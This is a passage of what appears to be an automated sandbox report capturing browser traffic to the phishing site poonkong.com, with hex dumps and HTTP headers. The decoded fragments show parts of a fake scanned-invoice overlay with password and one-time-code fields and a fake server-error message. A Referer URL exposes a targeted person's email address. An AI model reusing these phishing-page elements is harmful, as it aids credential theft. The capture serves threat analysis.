32 30 5c 78
                            Data Ascii: \x20<div\x20class=\x22doc_overlay\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20style=\x22bottom:\x2030px;\x22>Scanned\x20Invoi..</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                            2024-11-14 22:38:02 UTC8000INData Raw: 50 53 33 33 6a 34 58 7a 5a 56 6b 74 4c 53 30 62 47 78 76 7a 62 57 4c 78 54 6b 48 38 32 4e 55 6b 4a 43 51 56 46 52 55 30 4e 54 58 71 70 4a 2f 77 76 4c 6a 68 68 6f 44 32 68 6e 33 74 52 44 66 76 41 41 44 6e 77 62 37 71 73 71 33 72 6d 35 58 56 74 72 54 33 73 4b 76 75 33 4e 76 34 75 37 66 6c 74 62 47 52 74 62 62 7a 41 41 41 66 6c 30 6c 45 51 56 52 34 6e 4f 31 39 43 57 50 64 4b 4c 4b 75 64 6e 45 62 7a 49 67 73 41 74 52 73 32 6f 37 64 4f 48 46 33 6b 6b 35 6d 65 70 6c 4f 33 33 6e 76 39 62 33 2f 2f 78 65 39 51 6d 66 78 64 6c 61 66 34 38 53 5a 38 57 64 72 51 34 69 6a 41 71 71 6f 67 67 4a 46 30 54 4f 65 38 59 78 6e 50 4f 4d 5a 7a 37 67 4a 33 4a 65 4a 6a 5a 31 30 56 68 42 4e 57 4b 31 79 52 35 6c 30 4a 75 4b 4f 43 6b 71 56 69 52 52 31 69 46 5a 4d 55 68 45 54 6e 6c 6a
                            Data Ascii: PS33j4XzZVktLS0bGxvzbWLxTkH82NUkJCQVFRU0NTXqpJ/wvLjhhoD2hn3tRDfvAADnwb7qsq3rm5XVtrT3sKvu3Nv4u7fltbGRtbbzAAAfl0lEQVR4nO19CWPdKLKudnEbzIgsAtRs2o7dOHF3kk5meplO33nv9b3//xe9Qmfxdlaf48SZ8WdrQ4ijAqqoggJF0TOe8YxnPOMZz7gJ3JeJjZ10VhBNWK1yR5l0JuKOCkqViRR1iFZMUhETnlj
                            2024-11-14 22:38:02 UTC8000INData Raw: 52 5a 70 75 6f 57 4b 6e 48 71 55 61 4b 77 52 6f 37 41 52 4e 48 7a 50 36 65 74 68 44 30 6d 36 6d 49 67 57 4f 4e 38 70 49 6c 70 35 30 39 73 72 68 4f 49 71 4b 35 55 6b 63 66 57 55 71 64 73 75 6f 76 54 54 7a 64 45 32 50 64 33 48 76 5a 47 32 45 6b 33 53 42 62 4c 48 31 64 76 4a 46 47 4d 56 4b 77 6d 52 4b 71 4a 6f 46 53 6f 4e 54 53 6f 4c 53 6f 4e 36 6d 34 62 4e 66 59 66 59 35 69 6c 45 57 46 6e 52 49 45 31 54 6b 61 66 43 6e 54 42 48 77 45 41 6a 48 49 6f 32 4c 4d 4a 48 30 4a 49 79 78 57 30 5a 74 70 73 4a 33 55 70 52 63 45 4e 49 4b 33 66 4a 57 31 42 59 37 49 33 74 52 61 79 74 6b 61 77 68 74 36 65 68 4a 72 59 57 51 71 71 57 4f 47 43 6b 30 44 32 73 37 61 67 48 33 4b 6c 51 4a 57 39 70 4e 79 52 2b 47 49 36 6a 41 51 74 63 6d 72 42 63 6c 69 65 62 4e 6d 5a 41 61 31 61 43
                            Data Ascii: RZpuoWKnHqUaKwRo7ARNHzP6ethD0m6mIgWON8pIlp509srhOIqK5UkcfWUqdsuovTTzdE2Pd3HvZG2Ek3SBbLH1dvJFGMVKwmRKqJoFSoNTSoLSoN6m4bNfYfY5ilEWFnRIE1TkafCnTBHwEAjHIo2LMJH0JIyxW0ZtpsJ3UpRcENIK3fJW1BY7I3tRaytkawht6ehJrYWQqqWOGCk0D2s7agH3KlQJW9pNyR+GI6jAQtcmrBcliebNmZAa1aC
                            2024-11-14 22:38:02 UTC8000INData Raw: 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 45 72 72 6f 72 5c 78 32 32 3e 53 65 72 76 65 72 5c 78 32 30 65 72 72 6f 72 2e 5c 78 32 30 70 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 2e 2e 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 49 6e 70 75 74 5c 78 32 32 5c 78 32 30 70 6c 61 63 65 68 6f 6c 64 65 72 3d 5c 78 32 32 50 61 73 73 77 6f 72 64 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 70 61 73 73 77 6f 72 64 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30
                            Data Ascii: 20class=\x22passwordError\x22>Server\x20error.\x20please\x20try\x20again...</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20class=\x22passwordInput\x22\x20placeholder=\x22Password\x22\x20type=\x22password\x22\x20name=\x22\x22>\x0a\x20\x20
                            2024-11-14 22:38:02 UTC8000INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6f 74 70 45 72 72 6f 72 32 5c 78 32 32 3e 2e 2e 2e 2e 2e 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6f 74 70 49 6e 70 75 74 32 5c 78 32 32 5c 78 32 30 70 6c 61 63 65 68 6f 6c 64 65 72 3d 5c 78 32 32 43 6f 64 65 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 74 65 78 74 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                            Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22otpError2\x22>.....</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20class=\x22otpInput2\x22\x20placeholder=\x22Code\x22\x20type=\x22text\x22\x20name=\x22\x22>\x0a\x20\x20\x20\x20\x20\x2


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.44974913.226.184.884433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:03 UTC558OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                            Host: cdn.socket.io
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: https://poonkong.com
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: script
                            Referer: https://poonkong.com/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:03 UTC703INHTTP/1.1 200 OK
                            Content-Type: application/javascript; charset=utf-8
                            Content-Length: 49993
                            Connection: close
                            Accept-Ranges: bytes
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=31536000, immutable
                            Content-Disposition: inline; filename="socket.io.min.js"
                            Date: Mon, 08 Jul 2024 16:14:48 GMT
                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                            Server: Vercel
                            Strict-Transport-Security: max-age=63072000
                            X-Vercel-Cache: HIT
                            X-Vercel-Id: cle1::98dns-1720455288093-71224f5c39fa
                            X-Cache: Hit from cloudfront
                            Via: 1.1 1a1071ad749dc5354175a7dc850ee18e.cloudfront.net (CloudFront)
                            X-Amz-Cf-Pop: DFW55-C1
                            X-Amz-Cf-Id: VOYV0A_nxof0v5b1PkcPsEzZHUKV4p_MIMFam4g67AZMyWpLvUOD5w==
                            Age: 11283207
                            2024-11-14 22:38:03 UTC15681INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                            2024-11-14 22:38:03 UTC16384INData Raw: 69 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75
                            Data Ascii: id this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fu
                            2024-11-14 22:38:03 UTC16384INData Raw: 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68
                            Data Ascii: :e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,th
                            2024-11-14 22:38:03 UTC1544INData Raw: 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72
                            Data Ascii: setTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.449750162.144.0.2294433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:04 UTC682OUTGET /favicon.ico HTTP/1.1
                            Host: poonkong.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://poonkong.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWIxQkJTbWM9JnVpZD1VU0VSMTgxMDIwMjRVMzkxMDE4NDY=N0123Njoe.nguyen@leg.wa.gov
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:04 UTC195INHTTP/1.1 500 Internal Server Error
                            Date: Thu, 14 Nov 2024 22:38:04 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 0
                            Content-Type: text/html; charset=utf-8


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.44975113.35.58.124433236C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:04 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                            Host: cdn.socket.io
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-11-14 22:38:05 UTC703INHTTP/1.1 200 OK
                            Content-Type: application/javascript; charset=utf-8
                            Content-Length: 49993
                            Connection: close
                            Accept-Ranges: bytes
                            Access-Control-Allow-Origin: *
                            Cache-Control: public, max-age=31536000, immutable
                            Content-Disposition: inline; filename="socket.io.min.js"
                            Date: Thu, 05 Sep 2024 12:10:03 GMT
                            ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                            Server: Vercel
                            Strict-Transport-Security: max-age=63072000
                            X-Vercel-Cache: HIT
                            X-Vercel-Id: fra1::qxsjc-1725538203767-a565e46decc2
                            X-Cache: Hit from cloudfront
                            Via: 1.1 0679859c01a1d918f3fb77e42174ecf8.cloudfront.net (CloudFront)
                            X-Amz-Cf-Pop: FRA60-P10
                            X-Amz-Cf-Id: ON7YFtCnQfhy8Ost8SIUQPDrCe_gSNaiXpYOYqmdvr0tS2OotWqMfg==
                            Age: 6897936
                            2024-11-14 22:38:05 UTC15681INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                            Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                            2024-11-14 22:38:05 UTC16384INData Raw: 69 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75
                            Data Ascii: id this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fu
                            2024-11-14 22:38:05 UTC16384INData Raw: 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68
                            Data Ascii: :e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,th
                            2024-11-14 22:38:05 UTC1544INData Raw: 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72
                            Data Ascii: setTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r


                            Session IDSource IPSource PortDestination IPDestination Port
                            12192.168.2.45513813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:38:50 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:38:51 UTC492INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:38:50 GMT
                            Content-Type: text/plain
                            Content-Length: 218853
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public
                            Last-Modified: Thu, 14 Nov 2024 16:27:56 GMT
                            ETag: "0x8DD04C94BD1CD28"
                            x-ms-request-id: 95228c9c-001e-008d-1ac3-36d91e000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223850Z-1866b5c5fbbsqznnhC1DFWg28g00000000fg00000000ksf3
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:38:51 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                            2024-11-14 22:38:51 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                            Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                            2024-11-14 22:38:51 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                            Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
